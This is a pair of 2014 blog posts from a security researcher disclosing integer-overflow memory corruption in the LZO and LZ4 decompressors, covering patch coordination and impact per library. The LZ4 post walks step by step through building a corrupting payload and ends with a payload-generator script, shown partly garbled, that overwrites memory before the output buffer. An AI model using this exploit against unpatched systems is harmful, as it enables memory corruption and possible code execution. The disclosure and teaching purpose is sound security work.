Friday, June 27, 2014

Understanding the LZ4 Memory Corruption Vulnerability

You Don't Play Right

The entire premise behind security auditing is to identify ways that software can be abused. Period. Our concern as analysts is not to evaluate software "within the parameters in which it should be used". The best security bugs are slight abuses of an API outside of the normal use cases. So, when an engineer claims that a flaw isn't a flaw at all because "no one will ever use the API in that fashion", they are misinformed. Unfortunately, by asserting this, they are also misinforming their peers and users. 

A similar issue has arisen here. The claim has been made that LZ4 is not vulnerable because every implementation will only call it with a certain amount of memory. Ok, so those use cases aren't vulnerable. I admitted to this in my original blog post when I stated that ZFS is a perfect example of LZ4 not being vulnerable because they limit their block size to 128k. Regardless, I haven't audited every implementation of the LZ4 vulnerability, so I could not make the assertion as to whether all, some, or none of the use cases are vulnerable. That would be speculation, which is a waste of everyone's time. 

There is a more important point. The point is that the algorithm doesn't care about size. There is no check in the decompression routine to determine whether an input buffer is too large, or even within the bounds of the algorithm's specification. There is no validation routine to ensure that the output buffer doesn't exceed a threshold. This means that anyone can use that code and call it in any way they choose. The caller doesn't have to play by the author's original rules, and the caller may not even know the rules because the algorithm doesn't enforce any. 

In fact, there are certain cases where this is desirable behavior. For instance, Anti Virus and Anti Spyware programs must be able to parse compressed data in order to evaluate whether a file is suspicious. If known variants of a virus or spyware break a compression's specification to evade A/V detection, so must the A/V application. This leaves A/V utilities open to vulnerabilities that they did not even intend to have simply because they are using an API in an unintended, but valid, fashion. 

This is how a lot of security vulnerabilities arise in projects. Code isn't adequately documented, or API calls aren't adequately guarded to enforce the author's constraints. When these gaps occur in APIs meant for general consumption, failures will absolutely occur. It doesn't matter if all current users of the algorithm adhere to a certain standard. There is no guarantee that users in the future will. 

It's Just Not Big Enough

The claim that 64bit platforms are not exploitable is incorrect. This is the same mindset that created today's LZO/LZ4 vulnerability. "No one will ever have that much RAM to cause a 32bit integer overflow!". Well, today we do. If this bug would have persisted and propagated further, surely 64bit architectures would be effected in the not-so-near future. 

This kind of attitude has no longevity. If you're building a threat model for today instead of projections of what likely states can occur in the future as well as today, you're not building a safe platform suitable for public consumption. You might as well rewrite the implementation every couple of years to suit the new architectures and platforms that are available. 

If we want to engineer safe, efficient, long lasting code, it has to be done using foresight and threat models that accurately account for today and tomorrow's likely environment. Threat models are not built on a snapshot in time, but on a reasonable projection of the life of a project. If there is no value placed in the project's longevity, then it's not a professional long lasting project. Why use something that isn't expected to last? 

A Literal Run Around

Now, on to the fun part. The details of the exploit. Before anyone worries, I reached out to the Linux team to make sure that the patches are in a position where I can post this information. They did not protest, largely because only the API itself is vulnerable - there are no vectors from which exploitation can occur at this time. So, let's take a look. Feel free to follow along at the LXR site. For ease of demonstration, presume a 32bit architecture so the exploit below is practical to test. 

To trigger the bug, two things need to happen. First, we need to be able to point to an address outside the bounds of the valid decompression output buffer. Second, we need to be able to write to that buffer. Let's start out with issue number one. 

Pointing North

To successfully set the write pointer variable 'op' outside of the bounds of the valid decompression buffer, there are a few steps that must be taken. Otherwise, we will hit an error condition and be forced to return from the decompression routine with error. 

 64         while (1) {
 66                 /* get runlength */
 67                 token = *ip++;
 68                 length = (token >> ML_BITS);
 69                 if (length == RUN_MASK) {

The code above is the first code we encounter on entry to the lz4_uncompress routine. Line 69 is the start of the loop that allows for integer overflow. However, we can't use it. Why? If we perform a Literal Run length accumulator now, we will error out too early. Instead, we must ignore this instance of the vulnerability and move on. 

 78                 /* copy literals */
 79                 cpy = op + length;
 80                 if (unlikely(cpy > oend - COPYLENGTH)) {
 81                         /*
 82                          * Error: not enough place for another match
 83                          * (min 4) + 5 literals
 84                          */
 85                         if (cpy != oend)
 86                                 goto _output_error;
 88                         memcpy(op, ip, length);
 89                         ip += length;
 90                         break; /* EOF */
 91                 }
 92                 LZ4_WILDCOPY(ip, op, cpy);
 93                 ip -= (op - cpy);
 94                 op = cpy;

Next, we have to bypass the above code without triggering an EOF condition and breaking the loop. To do this, we simply place a small literal copy value as the first input byte. This will ensure the expression at line 80 does not evaluate to True. 

The LZ4_WILDCOPY will copy a few bytes from the input pointer 'ip' into the output pointer 'op'. Note that 'ip' is reset to the current address minus the size of the actual copied bytes. The output pointer, as expected, now points past the copied bytes to the next available output byte. 

 96                 /* get offset */
 97                 LZ4_READ_LITTLEENDIAN_16(ref, cpy, ip);
 98                 ip += 2;
100                 /* Error: offset create reference outside destination buffer */
101                 if (unlikely(ref < (BYTE *const) dest))
102                         goto _output_error;

This is where things get slightly tricky. The above code on line 97 retrieves a 16bit little-endian "reference" value from the input buffer. Remember now the input buffer has been rewound? This means that we need to embed the reference value at the start of the literal copy. 

We also have to bypass the check at line 101. Since 'ref' is a pointer to the output buffer, and we can't really abuse it to corrupt memory, we should just set this to zero to ignore the whole mess. Therefore, we have our first real values in the payload: 0x00, 0x00. These two bytes will give us a 'ref' value offset of 0x0000. 

104                 /* get matchlength */
105                 length = token & ML_MASK;
106                 if (length == ML_MASK) {
107                         for (; *ip == 255; length += 255)
108                                 ip++;
109                         length += *ip++;
110                 }

Next, we hit the code chunk at line 105. The token value is the same value that it was at the beginning of this loop, when we entered the function. This means that the first byte of the input payload must be set to ML_MASK to perform the above (second) Literal Run size accumulator. Since ML_MASK is defined as 0x0f, this becomes our first byte in the payload. Now we know what the first three bytes have to be: 0x0f, 0x00, 0x00. 

Because the input pointer is now at address &input[3], and we are trying to abuse this accumulator loop to build a large value, we need a large amount of bytes here that equate to 255. On line 107, as long as a byte from the input buffer equals 255, the loop will continue, and 'length' will grow. 

Remember two things. First, the token value must have ML_MASK set. This means that the token variable must equate to 0x0f. This also means that the first Literal Run copies fifteen bytes. Our first two bytes in that copy buffer must be 0x00 0x00 for 'ref'. Thus, thirteen more bytes must be set to 0xff to complete that run. 

In this run, we will generate a sample value of 0xfffffff0. To do so, we need a total of 16,843,008 bytes set to 0xff. We already have thirteen bytes, so we need 16,842,995 more. 

To break out of the for loop, on line 107, we simply finish the run with the value 0xcd, which completes the 'length' variable's accumulation to 0xfffffff0. 

112                 /* copy repeated sequence */
113                 if (unlikely((op - ref) < STEPSIZE)) {

The expression at line 113 evaluates to True. We don't really care about this block of code because we don't have to accommodate for anything that is performed here. 

132                 cpy = op + length - (STEPSIZE - 4);
133                 if (cpy > (oend - COPYLENGTH)) {
135                         /* Error: request to write beyond destination buffer */

This is where things get fun. On line 132, the overflow occurs. Now that we have a sufficiently large value in 'length', we can overflow the pointer 'op'. This will cause 'cpy' to point to an address prior to the start of the output buffer. Since it is before even the beginning of the output buffer, the expression on 133 will never evaluate to True, bypassing this error check.

150                 LZ4_SECURECOPY(ref, op, cpy);
151                 op = cpy; /* correction */
152         }

The LZ4_SECURECOPY is actually a NO-OP here. Why? It validates that 'op' is before 'cpy' before implementing the actual copy operation. As a result, no copy will occur. But, that is OK because we don't want the copy to occur here. Instead, something better happens. The pointer 'op' is set to 'cpy', ensuring that the output pointer now points to a memory address we control. 

Lastly, at line 152, we loop back to the top of the function. 

Writing Home

Now that we are back at the start of the while loop, we can write as much data to which ever address in memory we desire. How? We simply specify the size of the write using either the simple length value or the Literal Run accumulator loop. 

 64         while (1) {
 66                 /* get runlength */
 67                 token = *ip++;
 68                 length = (token >> ML_BITS);
 69                 if (length == RUN_MASK) {

Once the length is generated, a copy is executed in the following code that we've already looked at:

 92                 LZ4_WILDCOPY(ip, op, cpy);
 93                 ip -= (op - cpy);
 94                 op = cpy;

That's it! The memory overwrite is complete. We have copied any number of bytes we choose to any where in memory we desire. This makes the LZ4 vulnerability far more precise than the LZO one. 

Make It Easy

At the bottom of this post, you'll find a script I've written to auto-generate the test payload above. It will overwrite memory 32 bytes prior to the start of the valid output buffer. This is valid memory corruption and can be tested fairly easily using the patched version of the Linux kernel's lz4_decompress.c from here.


To summarize, security auditing isn't about exploitation. Auditing is about finding critical bugs. Critical bugs don't have to have an immediate context for exploitation, they just have to have a legitimately critical implementation that could affect multiple platforms in the near future. This is true of the LZ4 vulnerability. Library based vulnerabilities are
  • Critical if they cause precise memory corruption, regardless of current use cases
  • Often present or are magnified in abnormal use cases such as Anti Virus applications 
  • Often vulnerable regardless of underlying architecture
  • Must be evaluated from a context of longevity
  • Cannot be ignored because current use cases aren't vulnerable; libraries can be used any way the application writer chooses
I hope this helps everyone understand my position on the critical nature of the LZ4 vulnerability. No, it currently wont get you Ring or Uid 0 on Linux. But, by closing this hole today, we know no one will in the future, either. And that's really what this is all about, right? 

Best wishes,
Don A. Bailey
Founder / CEO
Lab Mouse Security

# LZ4 Exploit Payload Generator
# Don A. Bailey 
# Overwrites memory with "donbdonb" 32 bytes prior to the valid start of
# the decompression output buffer.
# June 27th, 2014


 printf $1 >> $FILE

 rm -f $FILE
 touch $FILE

 x="\"\\xff\" x $1"
 perl -e "print $x" >> $FILE

# initialize the file

# simple literal run; no mask
append "\x0f"

# copy the fifteen bytes and embed a null ref
# the second mask must be embedded here as well
# note that the second mask starts at the first 0xff
append "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

# goal is 0xfffffff0
# now we need (16843008 - 13) 0xff bytes 
large 16842995

# complete the sequence
append "\xcd"

# because cpy is lower than op, LZ4_SECURECOPY will fail
# op is now set to the mangled cpy

# create a simple literal run length without a RUN_MASK
# and copy 8 bytes to the corrupted pointer address
append "\x08"

append "donbdonb"

Thursday, June 26, 2014

Raising Lazarus - The 20 Year Old Bug that Went to Mars

Twenty Years Old

Mars Curiosity Rover
It's rare that you come across a bug so subtle that it can last for two decades. But, that's exactly what has happened with the Lempel-Ziv-Oberhumer (LZO) algorithm. Initially written in 1994, Markus Oberhumer designed a sophisticated and extremely efficient compression algorithm so elegant and well architected that it outperforms zlib and bzip by four or five times their decompression speed.

As a result, Markus has made a successful and well deserved career out of optimizing code for various platforms. I was impressed to find out that his LZO algorithm has gone to the planet Mars on NASA devices multiple times! Most recently, LZO has touched down on the red planet within the Mars Curiosity Rover, which just celebrated its first martian anniversary on Tuesday.

Because of the speed and efficiency of the algorithm, LZO has made its way into both proprietary and open source projects world-wide. It's has lived in automotive systems, airplanes, and other embedded systems for over a decade. The algorithm has even made its way into projects we use on a daily basis, such as OpenVPN, MPlayer2, LibavFFmpeg, the Linux kernel, Juniper Junos, and much, much, more.

In the past few years, LZO has gained traction in file systems as well. LZO can be used in the Linux kernel within btrfs, squashfs, jffs2, and ubifs. A recent variant of the algorithm, LZ4, is used for compression in ZFS for Solaris, Illumos, and FreeBSD.

LZO is even enabled in kernels for Samsung Android devices to increase kernel loading speed and improve the user experience, as noted in the Android Hacker's Handbook.

With its popularity increasing, Lempel-Ziv-Oberhumer has been rewritten by many engineering firms for both closed and open systems. These rewrites, however, have always been based on Oberhumer's core open source implementation. As a result, they all inherited a subtle integer overflow. Even LZ4 has the same exact bug, but changed very slightly.

Engineered Genetics

Code reuse is a normal part of engineering, and is something we do every day. But, it can be dangerous. By reusing code that is known to work well, especially in highly optimized algorithms, projects can become subject to vulnerabilities in what is perceived as trusted code. Auditing highly optimized algorithms is a fragile endeavor. It is very easy to break these types of algorithms. Therefore, reused code that is highly specialized is often presumed safe because of its age, its proven efficiency, and its fragility.

This creates a sort of digital DNA, a digital genetic footprint that can be traced over time. Though there are certainly many instances of proprietary variants of LZO and LZ4, the following six implementations are available in open source software

Despite each implementation of the algorithm being noticeably different, each variant is vulnerable in the exact same way. Let's take a look at a version of the algorithm that is easy to read online, the Linux kernel implementation found here

In all variants of LZ[O4], the vulnerability occurs when processing a Literal Run. This is a chunk of compressed data that isn't compressed at all. Literals are uncompressed bytes that the user decided, for whatever reason, should not be compressed. A Literal Run is signaled by a state machine in LZO, and by a Mask in LZ4.

 56                         if (likely(state == 0)) {
 57                                 if (unlikely(t == 0)) {
 58                                         while (unlikely(*ip == 0)) {
 59                                                 t += 255;
 60                                                 ip++;
 61                                                 NEED_IP(1);
 62                                         }
 63                                         t += 15 + *ip++;
 64                                 }
 65                                 t += 3;

In the above sample, the integer overflow is evident. The variable 't' is incremented by 255 every time the compression payload contains a nil byte (0x00) when a Literal Run is detected. Regardless of whether the variable 't' is signed or unsigned, 255 will be added to it. The only check is to ensure that the input buffer contains another byte. This means that 't' can accumulate until it is a very large unsigned integer. If 't' is a 32bit integer, it only takes approximately sixteen (16) megabytes of zeroes to generate a sufficiently large value for 't'. Though 't' can overflow here, this is not where the attack occurs. There is another more important overflow just below this chunk of code. 

66 copy_literal_run:
68                                 if (likely(HAVE_IP(t + 15) && HAVE_OP(t + 15))) {
69                                         const unsigned char *ie = ip + t;
70                                         unsigned char *oe = op + t;
71                                         do {
72                                                 COPY8(op, ip);
73                                                 op += 8;
74                                                 ip += 8;
75                                                 COPY8(op, ip);
76                                                 op += 8;
77                                                 ip += 8;
78                                         } while (ip < ie);
79                                         ip = ie;
80                                         op = oe;
81                                 } else
82 #endif

Above, we see the "copy_literal_run" chunk of code. This is the section of the LZO algorithm that uses the variable 't' as a size parameter. On line 68, the code ensures that the input buffer (IP) and output buffer (OP) are large enough to contain 't' bytes. However, in the Linux kernel implementation, they pad by 15 bytes to ensure the 16 byte copy does not overflow either buffer. This is where things fail.

The macros HAVE_IP and HAVE_OP validate that 't' bytes are available in the respective buffer. But, before the macro is called, the expression (t + 15) is evaluated. If the value of 't' is large enough, this expression will cause an integer overflow. The attacker can make this expression result in a value of zero (0) through fourteen (14) by forcing 't' to equal the values -15 to -1, respectively. This means that the HAVE macros will always believe that enough space is available in both input and output buffers.

On line 70, the pointer 'oe' will now point to before the 'op' buffer, potentially pointing to memory prior to the start of the output buffer. The subsequent code will copy sixteen (16) bytes from the input pointer to the output pointer, which does nothing as these pointers should point to a "safe" location in memory. However, there are two side effects here that the attacker must abuse: lines 78 and 80.

Because 'ie' will always have an address lower in memory than 'ip', the loop is immediately broken after the first sixteen (16) byte copy. This means that the value 't' did not cause a crash in the copy loop, making this copy essentially a no-op from the attacker's point of view. Most importantly, on line 80 (and 79), the buffer pointer is set to the overflown pointer. This means that now, the output pointer points to memory outside of the bounds of the output buffer. The attacker now has the capability to corrupt memory, or at least cause a Denial of Service (DoS) by writing to an invalid memory page.

The Impact of Raising Dead Code

Each variant of the LZO and LZ4 implementation is vulnerable in slightly different ways. The attacker must construct a malicious payload to fit each particular implementation. One payload cannot be used to trigger more than a DoS on each implementation. Because of the slightly different overflow requirements, state machine subtleties, and overflow checks that must be bypassed, even a worldwide DoS is not a simple task. 

This results in completely different threats depending on the implementation of the algorithm, the underlying architecture, and the memory layout of the target application. Remote Code Execution (RCE) is possible on multiple architectures and platforms, but absolutely not all. Denial of Service is possible on most implementations, but not all. Adjacent Object Over-Write (OOW) is possible on many architectures.

Lazarus raised from the dead
Because the LZO algorithm is considered a library function, each specific implementation must be evaluated for risk, regardless of whether the algorithm used has been patched. Why? We are talking about code that has existed in the wild for two decades. The scope of this algorithm touches everything from embedded microcontrollers on the Mars Rover, mainframe operating systems, modern day desktops, and mobile phones. Engineers that have used LZO must evaluate the use case to identify whether or not the implementation is vulnerable, and in what format.

Here is a list of impact based on each library. Implementations, or use cases of each library may change the threat model enough to warrant reclassification. So, please have a variant audited by a skilled third party, such as <shameless plug>.

  • Oberhumer LZO
    • RCE: Impractical 
    • DoS: Practical
    • OOW: Practical
    • NOTE: 64bit platforms are impractical for all attacks
  • Linux kernel LZO
    • RCE: Impractical
    • DoS: Practical
    • OOW: Practical
    • NOTE: Only i386/PowerPC are impacted at this time
  • Libav LZO
    • RCE: Practical
    • DoS: Practical
    • OOW: Practical
  • FFmpeg LZO
    • RCE: Practical
    • DoS: Practical
    • OOW: Practical
  • Linux kernel LZ4
    • RCE: Practical
    • DoS: Practical
    • OOW: Practical
    • NOTE: 64bit architectures are NOT considered practical
  • LZ4
    • RCE: Practical
    • DoS: Practical
    • OOW: Practical
    • NOTE: 64bit architectures are NOT considered practical
For a bug report on each implementation, please visit the Lab Mouse Security's vulnerability site. 

How Do You Know If You're Vulnerable

Projects Using LZO/LZ4

The easiest way to identify whether your specific implementation is vulnerable is to determine the maximum chunk size that is passed to the decompress routine. If buffers of sixteen (16) megabytes or more can be passed to the LZO or LZ4 decompress routine in one call, then exploitation of the integer overflow is possible. For example, ZFS constrains buffer sizes to 128k. So, even though they use a vulnerable implementation of LZ4, an attack is not possible without a second bug to bypass the buffer size constraint. 

The second easiest way is to identify the bit size of the count variable. If the count variable (for example, named 't' in the Linux kernel code shown above) is 64bit, it would take such a massive amount of data to trigger the overflow that the attack would likely be infeasible, regardless of how much data can be passed to the vulnerable function in one call. This is due to the fact that even modern computers do not have enough RAM available to store the data required to implement such an attack. 

However, there is a specific issue with the previous check. Validate that even if the count variable is 64bit in size, the value used is still 64bit when a length value is checked. If the actual length value is truncated to 32bits, the attack will still work with only sixteen (16) megabytes of data. 


All users of FFmpeg, Libav, and projects that depend on them, should consider themselves at risk to remote code execution. Period. Please update your software from the FFmpeg and Libav websites, or refrain from using these applications until your distribution has an adequate patch. 

It should be noted that certain Linux distributions package Mplayer2 with the base system by default. MPlayer2 is vulnerable to RCE "out of the box". If your distribution packages MPlayer2 by default, be sure to disable the embedded media player plugin (gecko-mediaplayer) for your browser. Firefox/Iceweasel, Chromium, Opera, Konqueror, and other Linux-based browsers are vulnerable to RCE regardless of the platform/architecture when an MPlayer2 plugin is enabled. 

Vendor Status

Lab Mouse has reached out to and worked with each vendor of the vulnerable algorithm. As of today, June 26th, 2014, all LZO vendors have patches either available online, or will later today. Please update as soon as possible to minimize the existing threat surface.

In the near future, Lab Mouse will publish a more technical blog on why and how RCE is possible using this bug. We consider that information to be imperative for both auditors and engineers, as it assists in identifying, classifying, and prioritizing a threat. However, that report will be released once the patches have been widely distributed for a sufficient amount of time.

For more information, please visit our contact page. We are more than happy to help your team with their use case, or implementation of these algorithms.


Overall, this is how this bug release breaks down.

  • Vendors have patches ready or released
  • Distributions have been notified 
  • Vendors of proprietary variants have been notified (where they could be found)
  • All bug reports can be found here
  • RCE is not only possible but practical on all Libav/FFmpeg based projects
  • All others are likely impractical to RCE, but still possible given a sufficiently skilled attacker

It is always exciting to uncover a vulnerability as subtle as this issue, especially one that has persisted and propagated for two decades. But, it makes me pause and consider the way we look at engineering as a model.

Speed and efficiency are imperatives for modern projects. We're building technology that touches our lives like never before. I know that most engineers strive to build not only elegant, but safe code. But, we still see security as a disparate discipline from engineering. Security and engineering could not be more tightly bound. Without engineering, you can't provide security to users. Without security, engineering cannot provide a stable and provable platform.

Neil deGrasse Tyson famously claimed, God is in the gaps. There is a similar issue in engineering. The individual often sees stability where the individual doesn't have expertise. Our God is the algorithm. We "bless" certain pieces of code because we don't have the time or knowledge to evaluate it. When we, as engineers and analysts, take that perspective, we are doing a disservice to the people that use our projects and services.

Often the best eyes are fresh or untrained eyes. The more we stop telling ourselves to step over the gaps in our code bases, the more holes we'll be able to fill. All it takes is one set of eyes to find a vulnerability, there is no level of expertise required to look and ask questions. Just look. Maybe you'll find the next 20 year old vulnerability.


I'd like to thank the following people for their great assistance patching, coordinating, and advising on this issue:

  • Greg Kroah-Hartman (Linux)
  • Linus Torvalds (Linux)
  • Kees Cook (Google)
  • Xin LI (FreeBSD)
  • Michael Niedermayer (FFmpeg)
  • Luca Barbato (Libav/Gentoo)
  • Markus Oberhumer
  • Christopher J. Dorros (NASA MSL)
  • Dan McDonald (Omniti)
  • Yves-Alexis Perez (Debian)
  • Kurt Seifried (Red Hat)
  • Willy Tarreau (Linux)
  • Solar Designer (Openwall)
  • The US-CERT team
  • The Oracle security team
  • The GE security team
  • Kelly Jackson Higgins (UBM)
  • Steve Ragan (IDG Enterprise)
  • Elinor Mills

Feeling Guilty?

Are you reading this post, thinking about all the administrators and engineers that are going to have to patch the LZO/LZ4 issue in your team's systems? Take some time to tell them how you feel with our hand crafted Lab Mouse Security custom Sympathy Card!

Hand crafted with the finest bits and bytes, our Sympathy Card shows your engineer what they mean to you and your team. This is a limited run of cards, and will proudly display the Linux kernel LZO exploit written by Lab Mouse on the card.

Best wishes,
Don A. Bailey
Founder / CEO
Lab Mouse Security
June 26th, 2014